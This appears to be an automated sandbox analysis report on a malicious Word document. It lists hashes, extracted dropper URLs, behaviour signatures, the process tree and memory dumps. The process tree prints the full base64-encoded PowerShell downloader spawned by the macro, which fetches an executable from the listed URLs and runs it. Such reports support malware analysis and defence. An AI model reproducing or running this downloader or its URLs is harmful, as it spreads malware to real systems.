Analysis

  • max time kernel
    102s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 21:25

General

  • Target

    sample.doc

  • Size

    169KB

  • MD5

    484bfdfec5742ade491aef716e253c6a

  • SHA1

    30a5778512aef149c40adb3e9292a7c8addac114

  • SHA256

    59353bd2a96cfde81847bcf1480a531f68a1fcf0738161455a352c5b9babe28f

  • SHA512

    68c82b5cb60622edf1dd420fe22ddfce92baf743b673bca19857381a334e18807589b7a1b400fd0c004b7bc96d78aafe2358f5573ae13e1e83bbf776e1e58058

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://manandvanwaterlooville.co.uk/wp-admin/prX892/

exe.dropper

https://uniral.com/captchasignup/4J579681/

exe.dropper

https://scyzm.net/lkx7/lqoH8S/

exe.dropper

https://amagna.nl/DZ9MzAobu3/37Z/

exe.dropper

https://nilinkeji.com/online/90fb31/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3936
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABWAEEARgBHAEsAaQBqAGMAPQAnAEoAQwBNAEQATQBiAHgAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBSAGkAVABZAFAAUgBPAFQAYABvAGMAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQQBXAEUAVgBSAGYAaQBzACAAPQAgACcANAAzADIAJwA7ACQAUQBNAFgAVQBNAHQAcQB4AD0AJwBIAFgAVwBTAFEAcABjAGwAJwA7ACQATABaAEYASQBYAGgAdQB2AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABBAFcARQBWAFIAZgBpAHMAKwAnAC4AZQB4AGUAJwA7ACQARQBQAFcAWgBWAGMAbAB0AD0AJwBXAEoAQwBZAFIAdQB5AGMAJwA7ACQARABVAEMASwBOAG8AbABsAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAFcAZQBiAEMATABJAGUATgBUADsAJABZAEoARgBQAEkAcwByAHUAPQAnAGgAdAB0AHAAOgAvAC8AbQBhAG4AYQBuAGQAdgBhAG4AdwBhAHQAZQByAGwAbwBvAHYAaQBsAGwAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGEAZABtAGkAbgAvAHAAcgBYADgAOQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AdQBuAGkAcgBhAGwALgBjAG8AbQAvAGMAYQBwAHQAYwBoAGEAcwBpAGcAbgB1AHAALwA0AEoANQA3ADkANgA4ADEALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGMAeQB6AG0ALgBuAGUAdAAvAGwAawB4ADcALwBsAHEAbwBIADgAUwAvACoAaAB0AHQAcABzADoALwAvAGEAbQBhAGcAbgBhAC4AbgBsAC8ARABaADkATQB6AEEAbwBiAHUAMwAvADMANwBaAC8AKgBoAHQAdABwAHMAOgAvAC8AbgBpAGwAaQBuAGsAZQBqAGkALgBjAG8AbQAvAG8AbgBsAGkAbgBlAC8AOQAwAGYAYgAzADEALwAnAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFgARwBTAE0AVQBsAGEAdQA9ACcATgBKAFcATwBLAHEAbAB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAE8AQgBCAEkAeQB5AG0AIABpAG4AIAAkAFkASgBGAFAASQBzAHIAdQApAHsAdAByAHkAewAkAEQAVQBDAEsATgBvAGwAbAAuACIAZABvAHcAYABOAGwATwBhAEQAYABGAEkAbABFACIAKAAkAEQATwBCAEIASQB5AHkAbQAsACAAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQATgBRAFIAVgBKAHQAaAB0AD0AJwBHAEoARwBCAFUAbgBzAGUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABMAFoARgBJAFgAaAB1AHYAKQAuACIATABgAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADIANAAwADUANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAEUAYABBAFQARQAiACgAJABMAFoARgBJAFgAaAB1AHYAKQA7ACQAUwBWAEwAWgBBAHYAeQBrAD0AJwBJAFoATQBNAFYAeQBrAGwAJwA7AGIAcgBlAGEAawA7ACQAQwBXAFoARgBBAHgAdABsAD0AJwBMAE8ASQBXAEcAbABzAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBSAFEAWgBLAGoAcgBsAD0AJwBUAFcASwBEAEoAYwBtAGIAJwA=
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2732

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2732-174-0x000001647F5D0000-0x000001647F5F2000-memory.dmp
    Filesize

    136KB

  • memory/2732-176-0x00007FFB044B0000-0x00007FFB04F71000-memory.dmp
    Filesize

    10.8MB

  • memory/3936-151-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-180-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-134-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-155-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-136-0x00007FFAECBE0000-0x00007FFAECBF0000-memory.dmp
    Filesize

    64KB

  • memory/3936-137-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-138-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-140-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-139-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-142-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-141-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-143-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-144-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-148-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-149-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-150-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-130-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-152-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-135-0x00007FFAECBE0000-0x00007FFAECBF0000-memory.dmp
    Filesize

    64KB

  • memory/3936-133-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-156-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-154-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-157-0x000001AEA1BF0000-0x000001AEA1BF4000-memory.dmp
    Filesize

    16KB

  • memory/3936-158-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-162-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-163-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-164-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-168-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-172-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-173-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-131-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-175-0x000001AE9F821000-0x000001AE9F823000-memory.dmp
    Filesize

    8KB

  • memory/3936-132-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-178-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-179-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB

  • memory/3936-153-0x000001AE9F7F5000-0x000001AE9F82B000-memory.dmp
    Filesize

    216KB

  • memory/3936-181-0x00007FFAEED50000-0x00007FFAEED60000-memory.dmp
    Filesize

    64KB